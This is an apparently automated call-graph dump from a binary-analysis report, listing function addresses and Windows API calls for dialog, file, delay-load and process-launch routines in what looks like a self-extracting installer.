calls 23077->23079 23078->23077 23081 36b3c0 IsValidCodePage 23078->23081 23084 36b3e5 ___scrt_fastfail 23078->23084 23080 36b1ea 23079->23080 23080->23025 23080->23028 23081->23077 23082 36b3d2 GetCPInfo 23081->23082 23082->23077 23082->23084 23107 36aff4 GetCPInfo 23084->23107 23085->23021 23086->23021 23087->23036 23088->23037 23089->23042 23090->23048 23093->23055 23094->23055 23096 363df3 23095->23096 23102 363de9 23095->23102 23097 368fa5 _abort 38 API calls 23096->23097 23096->23102 23098 363e14 23097->23098 23103 3690fa 38 API calls __cftof 23098->23103 23100 363e2d 23104 369127 38 API calls __cftof 23100->23104 23102->23064 23102->23065 23103->23100 23104->23102 23105->23073 23106->23072 23112 36b02e 23107->23112 23116 36b0d8 23107->23116 23109 35ec4a TranslatorGuardHandler 5 API calls 23111 36b184 23109->23111 23111->23077 23117 36c099 23112->23117 23115 36a275 __vswprintf_c_l 43 API calls 23115->23116 23116->23109 23118 363dd6 __cftof 38 API calls 23117->23118 23119 36c0b9 MultiByteToWideChar 23118->23119 23121 36c0f7 23119->23121 23122 36c18f 23119->23122 23124 368518 __vswprintf_c_l 21 API calls 23121->23124 23128 36c118 __vsnwprintf_l ___scrt_fastfail 23121->23128 23123 35ec4a TranslatorGuardHandler 5 API calls 23122->23123 23125 36b08f 23123->23125 23124->23128 23131 36a275 23125->23131 23126 36c189 23136 36a2c0 20 API calls _free 23126->23136 23128->23126 23129 36c15d MultiByteToWideChar 23128->23129 23129->23126 23130 36c179 GetStringTypeW 23129->23130 23130->23126 23132 363dd6 __cftof 38 API calls 23131->23132 23133 36a288 23132->23133 23137 36a058 23133->23137 23136->23122 23138 36a073 __vswprintf_c_l 23137->23138 23139 36a099 MultiByteToWideChar 23138->23139 23140 36a0c3 23139->23140 23141 36a24d 23139->23141 23146 368518 __vswprintf_c_l 21 API calls 23140->23146 23148 36a0e4 __vsnwprintf_l 23140->23148 23142 35ec4a TranslatorGuardHandler 5 API calls 23141->23142 23143 36a260 23142->23143 23143->23115 23144 36a199 23173 36a2c0 20 API calls _free 23144->23173 23145 36a12d MultiByteToWideChar 23145->23144 23147 36a146 23145->23147 23146->23148 23164 36a72c 23147->23164 23148->23144 23148->23145 23152 36a170 23152->23144 23155 36a72c __vswprintf_c_l 11 API calls 23152->23155 23153 36a1a8 23154 368518 __vswprintf_c_l 21 API calls 23153->23154 23157 36a1c9 __vsnwprintf_l 23153->23157 23154->23157 23155->23144 23156 36a23e 23172 36a2c0 20 API calls _free 23156->23172 23157->23156 23158 36a72c __vswprintf_c_l 11 API calls 23157->23158 23160 36a21d 23158->23160 23160->23156 23161 36a22c WideCharToMultiByte 23160->23161 23161->23156 23162 36a26c 23161->23162 23174 36a2c0 20 API calls _free 23162->23174 23165 36a458 _abort 5 API calls 23164->23165 23166 36a753 23165->23166 23169 36a75c 23166->23169 23175 36a7b4 10 API calls 3 library calls 23166->23175 23168 36a79c LCMapStringW 23168->23169 23170 35ec4a TranslatorGuardHandler 5 API calls 23169->23170 23171 36a15d 23170->23171 23171->23144 23171->23152 23171->23153 23172->23144 23173->23141 23174->23144 23175->23168 23176->23010 24892 3496a0 79 API calls 24938 36e9a0 51 API calls 24895 35e4a2 38 API calls 2 library calls 24940 362397 48 API calls 23196 35d997 23197 35d89b 23196->23197 23199 35df59 23197->23199 23227 35dc67 23199->23227 23201 35df73 23202 35dfd0 23201->23202 23215 35dff4 23201->23215 23203 35ded7 DloadReleaseSectionWriteAccess 11 API calls 23202->23203 23204 35dfdb RaiseException 23203->23204 23205 35e1c9 23204->23205 23207 35ec4a TranslatorGuardHandler 5 API calls 23205->23207 23206 35e0df 23212 35e19b 23206->23212 23214 35e13d GetProcAddress 23206->23214 23209 35e1d8 23207->23209 23208 35e06c LoadLibraryExA 23210 35e0cd 23208->23210 23211 35e07f GetLastError 23208->23211 23209->23197 23210->23206 23216 35e0d8 FreeLibrary 23210->23216 23213 35e0a8 23211->23213 23224 35e092 23211->23224 23238 35ded7 23212->23238 23217 35ded7 DloadReleaseSectionWriteAccess 11 API calls 23213->23217 23214->23212 23218 35e14d GetLastError 23214->23218 23215->23206 23215->23208 23215->23210 23215->23212 23216->23206 23219 35e0b3 RaiseException 23217->23219 23222 35e160 23218->23222 23219->23205 23221 35ded7 DloadReleaseSectionWriteAccess 11 API calls 23223 35e181 RaiseException 23221->23223 23222->23212 23222->23221 23225 35dc67 ___delayLoadHelper2@8 11 API calls 23223->23225 23224->23210 23224->23213 23226 35e198 23225->23226 23226->23212 23228 35dc73 23227->23228 23229 35dc99 23227->23229 23246 35dd15 23228->23246 23229->23201 23232 35dc94 23256 35dc9a 23232->23256 23235 35df24 23236 35ec4a TranslatorGuardHandler 5 API calls 23235->23236 23237 35df55 23236->23237 23237->23201 23239 35dee9 23238->23239 23240 35df0b 23238->23240 23241 35dd15 DloadLock 8 API calls 23239->23241 23240->23205 23242 35deee 23241->23242 23243 35df06 23242->23243 23244 35de67 DloadProtectSection 3 API calls 23242->23244 23265 35df0f 8 API calls 2 library calls 23243->23265 23244->23243 23247 35dc9a DloadLock 3 API calls 23246->23247 23248 35dd2a 23247->23248 23249 35ec4a TranslatorGuardHandler 5 API calls 23248->23249 23250 35dc78 23249->23250 23250->23232 23251 35de67 23250->23251 23254 35de7c DloadObtainSection 23251->23254 23252 35de82 23252->23232 23253 35deb7 VirtualProtect 23253->23252 23254->23252 23254->23253 23264 35dd72 VirtualQuery GetSystemInfo 23254->23264 23257 35dca7 23256->23257 23258 35dcab 23256->23258 23257->23235 23259 35dcb3 GetModuleHandleW 23258->23259 23260 35dcaf 23258->23260 23261 35dcc9 GetProcAddress 23259->23261 23263 35dcc5 23259->23263 23260->23235 23262 35dcd9 GetProcAddress 23261->23262 23261->23263 23262->23263 23263->23235 23264->23253 23265->23240 23266 35d891 19 API calls ___delayLoadHelper2@8 24897 357090 114 API calls 24898 35cc90 69 API calls 24941 35a990 96 API calls 24942 359b90 GdipCloneImage GdipAlloc 24943 369b90 21 API calls 2 library calls 24900 35a89d 78 API calls 24901 34ea98 FreeLibrary 23272 341385 82 API calls 3 library calls 24945 365780 QueryPerformanceFrequency QueryPerformanceCounter 24946 35ebf7 20 API calls 23513 35e1f9 23514 35e203 23513->23514 23515 35df59 ___delayLoadHelper2@8 19 API calls 23514->23515 23516 35e210 23515->23516 23518 35aee0 23519 35aeea __EH_prolog 23518->23519 23681 34130b 23519->23681 23522 35af2c 23525 35afa2 23522->23525 23526 35af39 23522->23526 23585 35af18 23522->23585 23523 35b5cb 23753 35cd2e 23523->23753 23528 35b041 GetDlgItemTextW 23525->23528 23533 35afbc 23525->23533 23529 35af75 23526->23529 23530 35af3e 23526->23530 23528->23529 23534 35b077 23528->23534 23541 35af96 KiUserCallbackDispatcher 23529->23541 23529->23585 23540 34ddd1 53 API calls 23530->23540 23530->23585 23531 35b5f7 23535 35b611 GetDlgItem SendMessageW 23531->23535 23536 35b600 SendDlgItemMessageW 23531->23536 23532 35b5e9 SendMessageW 23532->23531 23539 34ddd1 53 API calls 23533->23539 23537 35b08f GetDlgItem 23534->23537 23679 35b080 23534->23679 23771 359da4 GetCurrentDirectoryW 23535->23771 23536->23535 23543 35b0c5 SetFocus 23537->23543 23544 35b0a4 SendMessageW SendMessageW 23537->23544 23545 35afde SetDlgItemTextW 23539->23545 23546 35af58 23540->23546 23541->23585 23542 35b641 GetDlgItem 23547 35b664 SetWindowTextW 23542->23547 23548 35b65e 23542->23548 23549 35b0d5 23543->23549 23564 35b0ed 23543->23564 23544->23543 23550 35afec 23545->23550 23791 341241 SHGetMalloc 23546->23791 23772 35a2c7 GetClassNameW 23547->23772 23548->23547 23553 34ddd1 53 API calls 23549->23553 23558 35aff9 GetMessageW 23550->23558 23550->23585 23557 35b0df 23553->23557 23554 35af5f 23559 35af63 SetDlgItemTextW 23554->23559 23554->23585 23555 35b56b 23560 34ddd1 53 API calls 23555->23560 23792 35cb5a 23557->23792 23563 35b010 IsDialogMessageW 23558->23563 23558->23585 23559->23585 23565 35b57b SetDlgItemTextW 23560->23565 23563->23550 23568 35b01f TranslateMessage DispatchMessageW 23563->23568 23569 34ddd1 53 API calls 23564->23569 23566 35b58f 23565->23566 23570 34ddd1 53 API calls 23566->23570 23568->23550 23572 35b124 23569->23572 23574 35b5b8 23570->23574 23571 35b6af 23578 35b6df 23571->23578 23582 34ddd1 53 API calls 23571->23582 23573 34400a _swprintf 51 API calls 23572->23573 23579 35b136 23573->23579 23580 34ddd1 53 API calls 23574->23580 23575 35b0e6 23691 34a04f 23575->23691 23577 35bdf5 98 API calls 23577->23571 23584 35bdf5 98 API calls 23578->23584 23609 35b797 23578->23609 23583 35cb5a 16 API calls 23579->23583 23580->23585 23589 35b6c2 SetDlgItemTextW 23582->23589 23583->23575 23591 35b6fa 23584->23591 23586 35b847 23592 35b850 EnableWindow 23586->23592 23593 35b859 23586->23593 23587 35b174 GetLastError 23588 35b17f 23587->23588 23697 35a322 SetCurrentDirectoryW 23588->23697 23590 34ddd1 53 API calls 23589->23590 23595 35b6d6 SetDlgItemTextW 23590->23595 23599 35b70c 23591->23599 23616 35b731 23591->23616 23592->23593 23596 35b876 23593->23596 23810 3412c8 GetDlgItem EnableWindow 23593->23810 23595->23578 23598 35b89d 23596->23598 23607 35b895 SendMessageW 23596->23607 23597 35b195 23602 35b1ac 23597->23602 23603 35b19e GetLastError 23597->23603 23598->23585 23608 34ddd1 53 API calls 23598->23608 23808 359635 32 API calls 23599->23808 23600 35b78a 23604 35bdf5 98 API calls 23600->23604 23611 35b237 23602->23611 23613 35b1c4 GetTickCount 23602->23613 23657 35b227 23602->23657 23603->23602 23604->23609 23606 35b86c 23811 3412c8 GetDlgItem EnableWindow 23606->23811 23607->23598 23615 35b8b6 SetDlgItemTextW 23608->23615 23609->23586 23614 35b825 23609->23614 23623 34ddd1 53 API calls 23609->23623 23618 35b407 23611->23618 23619 35b24f GetModuleFileNameW 23611->23619 23612 35b46c 23713 3412e6 GetDlgItem ShowWindow 23612->23713 23620 34400a _swprintf 51 API calls 23613->23620 23809 359635 32 API calls 23614->23809 23615->23585 23616->23600 23624 35bdf5 98 API calls 23616->23624 23618->23529 23632 34ddd1 53 API calls 23618->23632 23802 34eb3a 80 API calls 23619->23802 23627 35b1dd 23620->23627 23622 35b725 23622->23616 23623->23609 23629 35b75f 23624->23629 23625 35b47c 23714 3412e6 GetDlgItem ShowWindow 23625->23714 23698 34971e 23627->23698 23628 35b844 23628->23586 23629->23600 23633 35b768 DialogBoxParamW 23629->23633 23631 35b275 23635 34400a _swprintf 51 API calls 23631->23635 23636 35b41b 23632->23636 23633->23529 23633->23600 23634 35b486 23637 34ddd1 53 API calls 23634->23637 23638 35b297 CreateFileMappingW 23635->23638 23639 34400a _swprintf 51 API calls 23636->23639 23641 35b490 SetDlgItemTextW 23637->23641 23642 35b2f9 GetCommandLineW 23638->23642 23675 35b376 __vswprintf_c_l 23638->23675 23643 35b439 23639->23643 23715 3412e6 GetDlgItem ShowWindow 23641->23715 23647 35b30a 23642->23647 23656 34ddd1 53 API calls 23643->23656 23644 35b203 23648 35b215 23644->23648 23649 35b20a GetLastError 23644->23649 23645 35b381 ShellExecuteExW 23672 35b39e 23645->23672 23803 35ab2e SHGetMalloc 23647->23803 23706 349653 23648->23706 23649->23648 23650 35b4a2 SetDlgItemTextW GetDlgItem 23653 35b4d7 23650->23653 23654 35b4bf GetWindowLongW SetWindowLongW 23650->23654 23716 35bdf5 23653->23716 23654->23653 23655 35b326 23804 35ab2e SHGetMalloc 23655->23804 23656->23529 23657->23611 23657->23612 23661 35b332 23805 35ab2e SHGetMalloc 23661->23805 23663 35b3e1 23663->23618 23669 35b3f7 UnmapViewOfFile CloseHandle 23663->23669 23664 35bdf5 98 API calls 23666 35b4f3 23664->23666 23665 35b33e 23806 34ecad 80 API calls ___scrt_fastfail 23665->23806 23741 35d0f5 23666->23741 23669->23618 23671 35b355 MapViewOfFile 23671->23675 23672->23663 23673 35b3cd Sleep 23672->23673 23673->23663 23673->23672 23674 35bdf5 98 API calls 23678 35b519 23674->23678 23675->23645 23676 35b542 23807 3412c8 GetDlgItem EnableWindow 23676->23807 23678->23676 23680 35bdf5 98 API calls 23678->23680 23679->23529 23679->23555 23680->23676 23682 341314 23681->23682 23683 34136d 23681->23683 23684 34137a 23682->23684 23812 34da98 61 API calls 2 library calls 23682->23812 23813 34da71 GetWindowLongW SetWindowLongW 23683->23813 23684->23522 23684->23523 23684->23585 23687 341336 23687->23684 23688 341349 GetDlgItem 23687->23688 23688->23684 23689 341359 23688->23689 23689->23684 23690 34135f SetWindowTextW 23689->23690 23690->23684 23694 34a059 23691->23694 23692 34a0ea 23693 34a207 9 API calls 23692->23693 23695 34a113 23692->23695 23693->23695 23694->23692 23694->23695 23814 34a207 23694->23814 23695->23587 23695->23588 23697->23597 23699 349728 23698->23699 23700 349792 CreateFileW 23699->23700 23701 349786 23699->23701 23700->23701 23702 3497e4 23701->23702 23703 34b66c 2 API calls 23701->23703 23702->23644 23704 3497cb 23703->23704 23704->23702 23705 3497cf CreateFileW 23704->23705 23705->23702 23707 349677 23706->23707 23712 349688 23706->23712 23708 349683 23707->23708 23709 34968a 23707->23709 23707->23712 23835 349817 23708->23835 23840 3496d0 23709->23840 23712->23657 23713->23625 23714->23634 23715->23650 23717 35bdff __EH_prolog 23716->23717 23718 35b4e5 23717->23718 23719 35aa36 ExpandEnvironmentStringsW 23717->23719 23718->23664 23730 35be36 _wcsrchr 23719->23730 23721 35aa36 ExpandEnvironmentStringsW 23721->23730 23722 35c11d SetWindowTextW 23722->23730 23725 3635de 22 API calls 23725->23730 23727 35bf0b SetFileAttributesW 23729 35bfc5 GetFileAttributesW 23727->23729 23740 35bf25 ___scrt_fastfail 23727->23740 23729->23730 23732 35bfd7 DeleteFileW 23729->23732 23730->23718 23730->23721 23730->23722 23730->23725 23730->23727 23733 35c2e7 GetDlgItem SetWindowTextW SendMessageW 23730->23733 23736 35c327 SendMessageW 23730->23736 23855 3517ac CompareStringW 23730->23855 23856 359da4 GetCurrentDirectoryW 23730->23856 23858 34a52a 7 API calls 23730->23858 23859 34a4b3 FindClose 23730->23859 23860 35ab9a 76 API calls new 23730->23860 23732->23730 23734 35bfe8 23732->23734 23733->23730 23735 34400a _swprintf 51 API calls 23734->23735 23737 35c008 GetFileAttributesW 23735->23737 23736->23730 23737->23734 23738 35c01d MoveFileW 23737->23738 23738->23730 23739 35c035 MoveFileExW 23738->23739 23739->23730 23740->23729 23740->23730 23857 34b4f7 52 API calls 2 library calls 23740->23857 23742 35d0ff __EH_prolog 23741->23742 23861 34fead 23742->23861 23744 35d130 23865 345c59 23744->23865 23746 35d14e 23869 347c68 23746->23869 23750 35d1a1 23886 347cfb 23750->23886 23752 35b504 23752->23674 23754 35cd38 23753->23754 24349 359d1a 23754->24349 23757 35cd45 GetWindow 23758 35b5d1 23757->23758 23761 35cd65 23757->23761 23758->23531 23758->23532 23759 35cd72 GetClassNameW 24354 3517ac CompareStringW 23759->24354 23761->23758 23761->23759 23762 35cd96 GetWindowLongW 23761->23762 23763 35cdfa GetWindow 23761->23763 23762->23763 23764 35cda6 SendMessageW 23762->23764 23763->23758 23763->23761 23764->23763 23765 35cdbc GetObjectW 23764->23765 24355 359d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23765->24355 23768 35cdd3 24356 359d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23768->24356 24357 359f5d 8 API calls ___scrt_fastfail 23768->24357 23770 35cde4 SendMessageW DeleteObject 23770->23763 23771->23542 23773 35a30d 23772->23773 23774 35a2e8 23772->23774 23778 35a7c3 23773->23778 24360 3517ac CompareStringW 23774->24360 23776 35a2fb 23776->23773 23777 35a2ff FindWindowExW 23776->23777 23777->23773 23779 35a7cd __EH_prolog 23778->23779 23780 341380 82 API calls 23779->23780 23781 35a7ef 23780->23781 24361 341f4f 23781->24361 23784 35a809 23786 341631 84 API calls 23784->23786 23785 35a818 23787 341951 126 API calls 23785->23787 23788 35a814 23786->23788 23790 35a83a __vswprintf_c_l new 23787->23790 23788->23571 23788->23577 23789 341631 84 API calls 23789->23788 23790->23788 23790->23789 23791->23554 23793 35ac74 5 API calls 23792->23793 23794 35cb66 GetDlgItem 23793->23794 23795 35cbbc SendMessageW SendMessageW 23794->23795 23796 35cb88 23794->23796 23797 35cc17 SendMessageW SendMessageW SendMessageW 23795->23797 23798 35cbf8 23795->23798 23801 35cb93 ShowWindow SendMessageW SendMessageW 23796->23801 23799 35cc6d SendMessageW 23797->23799 23800 35cc4a SendMessageW 23797->23800 23798->23797 23799->23575 23800->23799 23801->23795 23802->23631 23803->23655 23804->23661 23805->23665 23806->23671 23807->23679 23808->23622 23809->23628 23810->23606 23811->23596 23812->23687 23813->23684 23815 34a214 23814->23815 23816 34a238 23815->23816 23817 34a22b CreateDirectoryW 23815->23817 23818 34a180 4 API calls 23816->23818 23817->23816 23820 34a26b 23817->23820 23819 34a23e 23818->23819 23821 34a27e GetLastError 23819->23821 23822 34b66c 2 API calls 23819->23822 23824 34a27a 23820->23824 23827 34a444 23820->23827 23821->23824 23825 34a254 23822->23825 23824->23694 23825->23821 23826 34a258 CreateDirectoryW 23825->23826 23826->23820 23826->23821 23828 35e360 23827->23828 23829 34a451 SetFileAttributesW 23828->23829 23830 34a494 23829->23830 23831 34a467 23829->23831 23830->23824 23832 34b66c 2 API calls 23831->23832 23833 34a47b 23832->23833 23833->23830 23834 34a47f SetFileAttributesW 23833->23834 23834->23830 23836 349820 23835->23836 23837 349824 23835->23837 23836->23712 23837->23836 23846 34a12d 23837->23846 23841 3496dc 23840->23841 23842 3496fa 23840->23842 23841->23842 23844 3496e8 CloseHandle 23841->23844 23843 349719 23842->23843 23854 346e3e 74 API calls 23842->23854 23843->23712 23844->23842 23847 35e360 23846->23847 23848 34a13a DeleteFileW 23847->23848 23849 34984c 23848->23849 23850 34a14d 23848->23850 23849->23712 23851 34b66c 2 API calls 23850->23851 23852 34a161 23851->23852 23852->23849 23853 34a165 DeleteFileW 23852->23853 23853->23849 23854->23843 23855->23730 23856->23730 23857->23740 23858->23730 23859->23730 23860->23730 23862 34feba 23861->23862 23890 341789 23862->23890 23864 34fed2 23864->23744 23866 34fead 23865->23866 23867 341789 76 API calls 23866->23867 23868 34fed2 23867->23868 23868->23746 23870 347c72 __EH_prolog 23869->23870 23907 34c827 23870->23907 23872 347c8d 23913 35e24a 23872->23913 23875 347cb7 23919 35440b 23875->23919 23877 347ddf 23878 347de9 23877->23878 23883 347e53 23878->23883 23951 34a4c6 23878->23951 23880 347f06 23880->23750 23881 347ec4 23881->23880 23957 346dc1 74 API calls 23881->23957 23883->23881 23885 34a4c6 8 API calls 23883->23885 23929 34837f 23883->23929 23885->23883 23887 347d09 23886->23887 23889 347d10 23886->23889 23888 351acf 84 API calls 23887->23888 23888->23889 23891 34179f 23890->23891 23902 3417fa __vswprintf_c_l 23890->23902 23892 3417c8 23891->23892 23903 346e91 74 API calls __vswprintf_c_l 23891->23903 23894 341827 23892->23894 23899 3417e7 new 23892->23899 23896 3635de 22 API calls 23894->23896 23895 3417be 23904 346efd 75 API calls 23895->23904 23898 34182e 23896->23898 23898->23902 23906 346efd 75 API calls 23898->23906 23899->23902 23905 346efd 75 API calls 23899->23905 23902->23864 23903->23895 23904->23892 23905->23902 23906->23902 23908 34c831 __EH_prolog 23907->23908 23909 35e24a new 8 API calls 23908->23909 23910 34c874 23909->23910 23911 35e24a new 8 API calls 23910->23911 23912 34c898 23911->23912 23912->23872 23914 35e24f new 23913->23914 23915 35e27b 23914->23915 23925 3671ad 7 API calls 2 library calls 23914->23925 23926 35ecce RaiseException __CxxThrowException@8 new 23914->23926 23927 35ecb1 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 23914->23927 23915->23875 23920 354415 __EH_prolog 23919->23920 23921 35e24a new 8 API calls 23920->23921 23922 354431 23921->23922 23923 347ce6 23922->23923 23928 3506ba 78 API calls 23922->23928 23923->23877 23925->23914 23928->23923 23930 348389 __EH_prolog 23929->23930 23958 341380 23930->23958 23932 3483a4 23966 349ef7 23932->23966 23938 3483d3 24086 341631 23938->24086 23942 3484ce 23989 341f00 23942->23989 23945 3484d9 23945->23938 23993 343aac 23945->23993 24003 34857b 23945->24003 23947 34a4c6 8 API calls 23948 3483cf 23947->23948 23948->23938 23948->23947 23950 34846e 23948->23950 24090 34bac4 CompareStringW 23948->24090 23985 348517 23950->23985 23952 34a4db 23951->23952 23953 34a4df 23952->23953 24337 34a5f4 23952->24337 23953->23878 23955 34a4ef 23955->23953 23956 34a4f4 FindClose 23955->23956 23956->23953 23957->23880 23959 341385 __EH_prolog 23958->23959 23960 34c827 8 API calls 23959->23960 23961 3413bd 23960->23961 23962 35e24a new 8 API calls 23961->23962 23965 341416 ___scrt_fastfail 23961->23965 23963 341403 23962->23963 23963->23965 24092 34b07d 23963->24092 23965->23932 23967 349f0e 23966->23967 23968 3483ba 23967->23968 24108 346f5d 76 API calls 23967->24108 23968->23938 23970 3419a6 23968->23970 23971 3419b0 __EH_prolog 23970->23971 23982 341a00 23971->23982 23984 3419e5 23971->23984 24109 34709d 23971->24109 23973 341b50 24112 346dc1 74 API calls 23973->24112 23975 343aac 97 API calls 23979 341bb3 23975->23979 23976 341b60 23976->23975 23976->23984 23977 341bff 23983 341c32 23977->23983 23977->23984 24113 346dc1 74 API calls 23977->24113 23979->23977 23980 343aac 97 API calls 23979->23980 23980->23979 23981 343aac 97 API calls 23981->23983 23982->23973 23982->23976 23982->23984 23983->23981 23983->23984 23984->23948 23986 348524 23985->23986 24131 350c26 GetSystemTime SystemTimeToFileTime 23986->24131 23988 348488 23988->23942 24091 351359 72 API calls 23988->24091 23991 341f05 __EH_prolog 23989->23991 23990 341f39 23990->23945 23991->23990 24133 341951 23991->24133 23994 343abc 23993->23994 23995 343ab8 23993->23995 23996 343af7 23994->23996 23997 343ae9 23994->23997 23995->23945 24268 3427e8 97 API calls 3 library calls 23996->24268 23999 343b29 23997->23999 24267 343281 85 API calls 3 library calls 23997->24267 23999->23945 24001 343af5 24001->23999 24269 34204e 74 API calls 24001->24269 24004 348585 __EH_prolog 24003->24004 24005 3485be 24004->24005 24009 3485c2 24004->24009 24292 3584bd 99 API calls 24004->24292 24006 3485e7 24005->24006 24005->24009 24011 34867a 24005->24011 24008 348609 24006->24008 24006->24009 24293 347b66 151 API calls 24006->24293 24008->24009 24294 3584bd 99 API calls 24008->24294 24009->23945 24011->24009 24270 345e3a 24011->24270 24014 348705 24014->24009 24276 34826a 24014->24276 24017 348875 24018 34a4c6 8 API calls 24017->24018 24019 3488e0 24017->24019 24018->24019 24280 347d6c 24019->24280 24021 34c991 80 API calls 24029 34893b _memcmp 24021->24029 24022 348a70 24023 348b43 24022->24023 24030 348abf 24022->24030 24027 348b9e 24023->24027 24040 348b4e 24023->24040 24024 348a69 24297 341f94 74 API calls 24024->24297 24037 348b30 24027->24037 24300 3480ea 96 API calls 24027->24300 24028 348b9c 24033 349653 79 API calls 24028->24033 24029->24009 24029->24021 24029->24022 24029->24024 24295 348236 82 API calls 24029->24295 24296 341f94 74 API calls 24029->24296 24034 34a180 4 API calls 24030->24034 24030->24037 24032 349653 79 API calls 24032->24009 24033->24009 24036 348af7 24034->24036 24035 348c09 24049 348c74 24035->24049 24085 3491c1 ___InternalCxxFrameHandler 24035->24085 24301 349989 24035->24301 24036->24037 24298 349377 96 API calls 24036->24298 24037->24028 24037->24035 24038 34aa88 8 API calls 24042 348cc3 24038->24042 24040->24028 24299 347f26 100 API calls ___InternalCxxFrameHandler 24040->24299 24045 34aa88 8 API calls 24042->24045 24043 348c4c 24043->24049 24305 341f94 74 API calls 24043->24305 24062 348cd9 24045->24062 24047 348c62 24306 347061 75 API calls 24047->24306 24049->24038 24050 348df7 24053 348e69 24050->24053 24054 348e07 24050->24054 24051 348efd 24056 348f23 24051->24056 24057 348f0f 24051->24057 24073 348e27 24051->24073 24052 348d9c 24052->24050 24052->24051 24055 34826a CharUpperW 24053->24055 24058 348e4d 24054->24058 24066 348e15 24054->24066 24059 348e84 24055->24059 24061 352c42 75 API calls 24056->24061 24060 3492e6 121 API calls 24057->24060 24058->24073 24309 347907 108 API calls 24058->24309 24069 348eb4 24059->24069 24070 348ead 24059->24070 24059->24073 24060->24073 24064 348f3c 24061->24064 24062->24052 24307 349b21 SetFilePointer GetLastError SetEndOfFile 24062->24307 24312 3528f1 121 API calls 24064->24312 24308 341f94 74 API calls 24066->24308 24311 349224 94 API calls __EH_prolog 24069->24311 24310 347698 84 API calls ___InternalCxxFrameHandler 24070->24310 24076 34904b 24073->24076 24313 341f94 74 API calls 24073->24313 24075 349156 24078 34a444 4 API calls 24075->24078 24075->24085 24076->24075 24077 349104 24076->24077 24076->24085 24286 349ebf SetEndOfFile 24076->24286 24287 349d62 24077->24287 24081 3491b1 24078->24081 24081->24085 24314 341f94 74 API calls 24081->24314 24082 34914b 24084 3496d0 75 API calls 24082->24084 24084->24075 24085->24032 24087 341643 24086->24087 24329 34c8ca 24087->24329 24090->23948 24091->23942 24093 34b087 __EH_prolog 24092->24093 24098 34ea80 80 API calls 24093->24098 24095 34b099 24099 34b195 24095->24099 24098->24095 24100 34b1a7 ___scrt_fastfail 24099->24100 24103 350948 24100->24103 24106 350908 GetCurrentProcess GetProcessAffinityMask 24103->24106 24107 34b10f 24106->24107 24107->23965 24108->23968 24114 3416d2 24109->24114 24111 3470b9 24111->23982 24112->23984 24113->23983 24115 3416e8 24114->24115 24126 341740 __vswprintf_c_l 24114->24126 24116 341711 24115->24116 24127 346e91 74 API calls __vswprintf_c_l 24115->24127 24118 341767 24116->24118 24123 34172d new 24116->24123 24120 3635de 22 API calls 24118->24120 24119 341707 24128 346efd 75 API calls 24119->24128 24122 34176e 24120->24122 24122->24126 24130 346efd 75 API calls 24122->24130 24123->24126 24129 346efd 75 API calls 24123->24129 24126->24111 24127->24119 24128->24116 24129->24126 24130->24126 24132 350c56 __vswprintf_c_l 24131->24132 24132->23988 24134 341961 24133->24134 24135 34195d 24133->24135 24137 341896 24134->24137 24135->23990 24138 3418a8 24137->24138 24139 3418e5 24137->24139 24140 343aac 97 API calls 24138->24140 24145 343f18 24139->24145 24143 3418c8 24140->24143 24143->24135 24149 343f21 24145->24149 24146 343aac 97 API calls 24146->24149 24147 341906 24147->24143 24150 341e00 24147->24150 24149->24146 24149->24147 24162 35067c 24149->24162 24151 341e0a __EH_prolog 24150->24151 24170 343b3d 24151->24170 24153 341e34 24154 3416d2 76 API calls 24153->24154 24156 341ebb 24153->24156 24155 341e4b 24154->24155 24198 341849 76 API calls 24155->24198 24156->24143 24158 341e63 24160 341e6f 24158->24160 24199 35137a MultiByteToWideChar 24158->24199 24200 341849 76 API calls 24160->24200 24163 350683 24162->24163 24164 35069e 24163->24164 24168 346e8c RaiseException __CxxThrowException@8 24163->24168 24165 3506af SetThreadExecutionState 24164->24165 24169 346e8c RaiseException __CxxThrowException@8 24164->24169 24165->24149 24168->24164 24169->24165 24171 343b47 __EH_prolog 24170->24171 24172 343b5d 24171->24172 24173 343b79 24171->24173 24229 346dc1 74 API calls 24172->24229 24174 343dc2 24173->24174 24178 343ba5 24173->24178 24246 346dc1 74 API calls 24174->24246 24177 343b68 24177->24153 24178->24177 24201 352c42 24178->24201 24180 343bf4 24181 343c26 24180->24181 24183 343c22 24180->24183 24185 343c12 24180->24185 24182 343cb1 24181->24182 24197 343c1d 24181->24197 24232 34c991 24181->24232 24214 34aa88 24182->24214 24183->24181 24231 342034 76 API calls 24183->24231 24230 346dc1 74 API calls 24185->24230 24190 343cc4 24191 343d3e 24190->24191 24192 343d48 24190->24192 24218 3492e6 24191->24218 24238 3528f1 121 API calls 24192->24238 24195 343d46 24195->24197 24239 341f94 74 API calls 24195->24239 24240 351acf 24197->24240 24198->24158 24199->24160 24200->24156 24202 352c51 24201->24202 24204 352c5b 24201->24204 24247 346efd 75 API calls 24202->24247 24205 352ca2 new 24204->24205 24208 352c9d Concurrency::cancel_current_task 24204->24208 24209 352cfd ___scrt_fastfail 24204->24209 24206 352da9 Concurrency::cancel_current_task 24205->24206 24207 352cd9 24205->24207 24205->24209 24250 36157a RaiseException 24206->24250 24248 352b7b 75 API calls 4 library calls 24207->24248 24249 36157a RaiseException 24208->24249 24209->24180 24213 352dc1 24215 34aa95 24214->24215 24217 34aa9f 24214->24217 24216 35e24a new 8 API calls 24215->24216 24216->24217 24217->24190 24219 3492f0 __EH_prolog 24218->24219 24251 347dc6 24219->24251 24222 34709d 76 API calls 24223 349302 24222->24223 24254 34ca6c 24223->24254 24225 349314 24226 34935c 24225->24226 24228 34ca6c 114 API calls 24225->24228 24263 34cc51 97 API calls __vswprintf_c_l 24225->24263 24226->24195 24228->24225 24229->24177 24230->24197 24231->24181 24233 34c9c4 24232->24233 24234 34c9b2 24232->24234 24265 346249 80 API calls 24233->24265 24264 346249 80 API calls 24234->24264 24237 34c9bc 24237->24182 24238->24195 24239->24197 24241 351ad9 24240->24241 24242 351af2 24241->24242 24245 351b06 24241->24245 24266 35075b 84 API calls 24242->24266 24244 351af9 24244->24245 24246->24177 24247->24204 24248->24209 24249->24206 24250->24213 24252 34acf5 GetVersionExW 24251->24252 24253 347dcb 24252->24253 24253->24222 24259 34ca82 __vswprintf_c_l 24254->24259 24255 34cbf7 24256 34cc1f 24255->24256 24257 34ca0b 6 API calls 24255->24257 24258 35067c SetThreadExecutionState RaiseException 24256->24258 24257->24256 24260 34cbee 24258->24260 24259->24255 24259->24260 24261 3584bd 99 API calls 24259->24261 24262 34ab70 89 API calls 24259->24262 24260->24225 24261->24259 24262->24259 